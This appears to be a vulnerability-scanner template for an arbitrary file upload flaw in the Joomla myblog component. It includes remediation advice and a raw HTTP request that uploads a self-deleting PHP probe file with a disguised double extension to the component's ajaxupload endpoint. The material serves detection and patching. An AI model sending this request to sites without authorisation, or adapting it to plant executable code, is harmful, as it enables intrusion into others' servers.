id: Joomla-upload-com_myblog
info:
  name: Joomla_com_Myblog_Arbitrary_File_Upload_Vulnerability
  author:
  - 折跃
  description: |-
    Arbitrary file upload vulnerability in Joomla! myblog component
    Joomla! is an open source content management system (CMS).

    There is a file upload vulnerability in the Joomla! myblog component. A remote attacker could exploit this vulnerability to upload files and execute code.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program:
    http://www.joomla.org/

    Temporary fix:
    1. The server side directly sets the file upload directory to non-executable.
    2. File type check: It is recommended to use the whitelist method (more reliable than the blacklist), combined with MIME Type, suffix check and other methods (the file type is restricted by the whitelist). In addition, you can use the compression function or resize function to process images, which will destroy the HTML code they contain while processing the image.
    3. Use random numbers to rewrite file names and file paths so that users cannot easily access their uploaded files.
    4. Set the domain name of the file server separately.
    5. Verify the file content and use regular rules to match malicious code (filter various bypass methods of malicious code, such as upper and lower case, BASE64 encoding) to limit uploading.
    6. Fix possible parsing vulnerabilities in the server.
    7. Strictly restrict the upload of files that can modify the server configuration, such as: .htaccess.
    8. Hide the upload file path.
    9. Fix the Web upload code in a timely manner.
    10. There cannot be any local files containing vulnerabilities.
    11. Pay attention to 0x00 truncation attack (update PHP to the latest version).
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - contains(body,'{{varName}}.php.xxxjpg')
  raw:
  - |
    POST /index.php?option=com_myblog&task=ajaxupload HTTP/1.1
    Host: {{hostname}}
    Accept: */*
    Content-Length: 235
    Content-Type: multipart/form-data; boundary=------------------------672e7d0b915bbd1b

    --------------------------672e7d0b915bbd1b
    Content-Disposition: form-data; name="fileToUpload"; filename="{{varName}}.php.xxxjpg"
    Content-Type: application/octet-stream

    <?php echo {{verify}};unlink(__FILE__);?>
    --------------------------672e7d0b915bbd1b
  req-condition: true
variables:
  varName: '{{rand_text_alphanumeric(8,"")}}'
  verify: '{{rand_text_alphanumeric(32,"")}}'
